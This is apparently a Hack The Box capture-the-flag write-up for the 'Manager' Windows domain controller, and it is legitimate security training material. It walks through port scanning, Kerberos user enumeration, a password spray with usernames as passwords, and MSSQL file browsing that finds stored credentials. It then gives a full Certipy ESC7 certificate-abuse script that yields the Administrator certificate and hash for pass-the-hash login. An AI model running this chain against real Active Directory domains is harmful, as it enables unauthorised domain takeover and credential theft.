Manager

Created by Geiseric

Hack The Box

The following post by 0xb0b is licensed under CC BY 4.0

---

Recon

The target host has multiple open ports indicating a Windows environment, including services such as DNS, web hosting with Microsoft IIS, Active Directory LDAP, Microsoft SQL Server 2019, RPC services, and others, suggesting potential avenues for further exploration and exploitation. We are dealing with a domain controller and received the domain and computer name from the Nmap scan:

manager.htb

dc01.manager.htb

ports=$(nmap -p- --min-rate=1000 -T4 manager.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -sC -sV -p$ports manager.htb

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 08:38 EDT
Nmap scan report for manager.htb (10.129.120.237)
Host is up (0.029s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-16 19:38:37Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.129.120.237:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.129.120.237:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-16T19:30:16
|_Not valid after:  2054-03-16T19:30:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49694/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49730/tcp open  msrpc         Microsoft Windows RPC
52872/tcp open  msrpc         Microsoft Windows RPC
52918/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m50s, deviation: 0s, median: 6h59m49s
| smb2-time: 
|   date: 2024-03-16T19:39:30
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.94 second

When enumerating the website, nothing could be detected apart from static web pages.

We are probably dealing with an active directory challenge. We can enumerate some users using Kerbrute. For this, we use the xato-net-10-million-usernames.txt from SecLists.

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub

┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ ./kerbrute_linux_amd64 userenum -d manager.htb /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt --dc dc01.manager.htb

Initial Foothold

We use the output to create a user list.

┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ sed -n 's/.*:\s*\([^@]\+\)@manager\.htb.*/\1/p' kerbrute-results.txt > usernames.txt

usernames.txt

ryan
guest
cheng
raven
administrator
Ryan
Raven
operator
Guest
Administrator
Cheng
jinwoo
RYAN
RAVEN
GUEST
Operator

Next, we try a password spray on the SMB port. We do this with the help of NetExec. We will also use the usernames as the password list. Maybe a user has used his username as a password. We issue the parameter --no-brute only to insert the password as the username. We have a hit for the user operator.

┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ nxc smb manager.htb -u usernames.txt -p usernames.txt --no-brute --continue-on-success

Let's see if we can use the credentials found to operate other services in addition to SMB. We can log in to the MSSQL service.

┌──(0xb0b㉿kali)-[~/Documnts/htb-app/manager]
└─$ mssqlclient.py manager.htb/operator:operator@manager.htb -windows-auth 

We can use xp_dirtree to display the folders and files on the system. In the wwwroot folder, we find the web.config and a backup zip.

EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;

Unfortunately, the web.config, which is a common location for stored credentials, cannot be retrieved directly. But the backup.

In the backup, we find an old config, and this contains the credentials for the user raven.

Using Evil-WinRM we can log in to the system and find the user flag on the user's desktop.

Privilege Escalation

We use Certipy to find a vulnerable configuration for ADCS.

┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ certipy  find -u raven@manager -p '<REDACTED>' -dc-ip 10.129.120.237 -vulnerable

We see that raven has dangerous permissions that allow the ESC7 attack.

A detailed explanation of the attack can be found here:

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuseGitHub

To issue the attack we place the commands in a simple script, since they have to be issued very quickly in succession. You have to set the password, and if already requests were made the request_id has to be adjusted.

esc7.sh

#!/bin/bash

# Set variables
CA='manager-DC01-CA'
USERNAME='raven@manager.htb'
PASSWORD='REDACTED'
TARGET='manager.htb'
REQUEST_ID='13'

# Command 1: Add officer
certipy ca -ca "$CA" -add-officer raven -username "$USERNAME" -password "$PASSWORD" &&
# Command 2: Enable template
certipy ca -ca "$CA" -enable-template SubCA -username "$USERNAME" -password "$PASSWORD" &&
# Command 3: Request
certipy req -username "$USERNAME" -password "$PASSWORD" -ca "$CA" -target "$TARGET" -template SubCA -upn administrator@manager.htb &&
# Command 4: Issue request
certipy ca -ca "$CA" -issue-request "$REQUEST_ID" -username "$USERNAME" -password "$PASSWORD" &&
# Command 5: Retrieve
certipy req -username "$USERNAME" -password "$PASSWORD" -ca "$CA" -target "$TARGET" -retrieve "$REQUEST_ID"

By executing the script we get the Administrator certificate

With that, we can retrieve the admin hash. The next commands have to be queued in quick succession and might fail. We have to synchronize our time with the DC.

┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager/certipy]
└─$ sudo ntpdate -s manager.htb && certipy auth -pfx administrator.pfx

We use Evil-WinRM to login as the Administrator by passing the retrieved hash. On the Desktop of the administrator, we find the final flag.